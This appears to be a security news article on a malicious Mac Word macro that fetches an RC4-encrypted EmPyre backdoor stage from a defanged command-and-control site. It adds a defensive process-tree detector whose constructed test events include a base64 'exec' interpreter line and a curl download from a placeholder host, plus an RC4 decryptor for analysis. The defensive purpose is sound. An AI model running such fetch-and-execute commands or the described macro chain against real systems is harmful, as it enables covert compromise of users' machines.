Malware that abuses macro-enabled Office documents has long been common among Windows users. After becoming widespread on Windows-based computers over the past few years, such malware is now targeting macOS users too.
In a recent incident, Patrick Wardle, Director of Research at Synack, came across a malicious Mac Word document titled “U.S. Allies and Rivals Digest Trump’s Victory – Carnegie Endowment for International Peace.docm” that was later identified as part of a malicious campaign targeting Mac users.
The attack works only on Mac versions of Word (attempts to execute it on Windows, or in Pages, the Mac-based productivity software similar to Word, fail).
The macro contains Python code that appears to have been copied from the open-source EmPyre project. EmPyre is a legitimate open-source macOS and Linux post-exploitation agent typically used in penetration-testing engagements.
When a user opens the attachment, they are presented with a popup instructing them to enable macros in order to view the document.
If macros are enabled, the macro executes its Python code, which first checks that LittleSnitch (a macOS outbound firewall) is not running.
The Python code embedded in the Word document then reaches out to command-and-control infrastructure at securitychecking[.]org[:]443/index[.]asp to download a second-stage payload.
The downloaded code is RC4-decrypted and then executed.
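The chain described above (Office document, macro, interpreter, network fetch) leaves a distinctive process-tree footprint: a Word or Excel process spawning an interpreter or a download tool. The following detection is an added example written for this article, not code from the researchers or from EmPyre. It runs over a few constructed JSON process-execution events (field names `ts`, `parent`, `image`, `cmdline` are assumptions about the telemetry format; `example.invalid` is a constructed placeholder) and flags the events a macOS endpoint analyst would want to review.

```python
import json
import os

# Office applications that should not normally spawn interpreters or network tools.
OFFICE_PARENTS = {"Microsoft Word", "Microsoft Excel", "Microsoft PowerPoint"}

# Child images whose appearance under an Office parent is worth investigating.
SUSPICIOUS_CHILDREN = {"python", "python3", "osascript", "bash", "sh", "zsh", "curl", "perl"}

# Constructed sample telemetry (not real events): one JSON object per line.
SAMPLE_EVENTS = "\n".join([
    json.dumps({"ts": "2017-02-06T10:01:02Z", "parent": "Microsoft Word",
                "image": "/usr/bin/python",
                "cmdline": "python -c \"import base64;exec(base64.b64decode('<constructed blob>'))\""}),
    json.dumps({"ts": "2017-02-06T10:03:15Z", "parent": "Terminal",
                "image": "/usr/bin/python", "cmdline": "python build.py"}),
    json.dumps({"ts": "2017-02-06T10:04:40Z", "parent": "Microsoft Word",
                "image": "/usr/bin/open", "cmdline": "open report.pdf"}),
    json.dumps({"ts": "2017-02-06T10:07:09Z", "parent": "Microsoft Excel",
                "image": "/usr/bin/curl", "cmdline": "curl https://example.invalid/stage2"}),
])


def parse_events(text):
    """Yield one dict per non-empty JSON line (assumed telemetry format)."""
    for line in text.splitlines():
        line = line.strip()
        if line:
            yield json.loads(line)


def classify(event):
    """Return the list of reasons an event is suspicious (empty if benign).

    The primary rule is the parent/child pairing; the command-line checks only
    add context once that pairing has fired, so a Terminal-launched interpreter
    with inline code is not flagged by itself.
    """
    child = os.path.basename(event["image"])
    reasons = []
    if event["parent"] in OFFICE_PARENTS and child in SUSPICIOUS_CHILDREN:
        reasons.append(f"office app spawned {child}")
        cmd = event.get("cmdline", "")
        if "-c " in cmd:
            reasons.append("inline interpreter code")
        if "http" in cmd.lower():
            reasons.append("network URL in command line")
    return reasons


def find_suspicious(text):
    """Run classify() over every event and collect the findings in order."""
    findings = []
    for ev in parse_events(text):
        reasons = classify(ev)
        if reasons:
            findings.append({"ts": ev["ts"], "parent": ev["parent"],
                             "image": ev["image"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_suspicious(SAMPLE_EVENTS):
        print(f["ts"], f["parent"], "->", f["image"], ";", "; ".join(f["reasons"]))
```

On the constructed sample, only the Word-spawned `python` and the Excel-spawned `curl` events are reported; the Terminal-launched script and Word opening a PDF are left alone. On real telemetry the parent-name set would need to cover the exact bundle or process names the EDR reports, and the child list is deliberately short so it can be tuned against the environment's baseline.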
The command-and-control site has since become inaccessible, so the researchers could not determine exactly what the second stage was, but it is likely the remaining EmPyre components.
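Because the second stage is RC4-encrypted, an analyst who does capture the downloaded blob (for example from a proxy log or a sandbox run) and recovers the key from the macro can decrypt it offline for inspection. The routine below is an added example, a textbook RC4 implementation written for this article rather than code taken from the macro or from EmPyre; it assumes plain RC4 with no key-scheduling variations and is checked against the published "Key"/"Plaintext" test vector. RC4 is symmetric, so the same function encrypts and decrypts.

```python
def rc4_keystream(key: bytes):
    """Generate the RC4 keystream for `key` (KSA followed by PRGA)."""
    if not key:
        raise ValueError("RC4 key must not be empty")
    S = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    i = j = 0
    while True:                               # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        yield S[(S[i] + S[j]) & 0xFF]


def rc4_crypt(key: bytes, data: bytes) -> bytes:
    """XOR `data` with the RC4 keystream; encryption and decryption are identical."""
    ks = rc4_keystream(key)
    return bytes(b ^ next(ks) for b in data)


def decrypt_stage(key: bytes, blob: bytes) -> bytes:
    """Decrypt a captured second-stage blob; the result is whatever the stage-1
    loader would have executed, so treat it as untrusted data, not as code to run."""
    return rc4_crypt(key, blob)


if __name__ == "__main__":
    # Constructed demonstration: a made-up key and a made-up "stage" string.
    demo_key = b"constructed-key"
    demo_blob = rc4_crypt(demo_key, b"print('constructed second stage')")
    print(decrypt_stage(demo_key, demo_blob).decode())
```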
As for the second-stage EmPyre components, Wardle said it is a persistent Mac backdoor capable of grabbing browser history, turning on the webcam, keylogging, and dumping hashes.
The IP address associated with securitychecking[.]org, the site hosting the malicious payload, appears to be geolocated in Russia. The site has previously been associated with cybercrime activity such as phishing and other malware downloads.
However, it is still unknown who is behind this campaign. Security researchers suspect that such campaigns may later start delivering ransomware.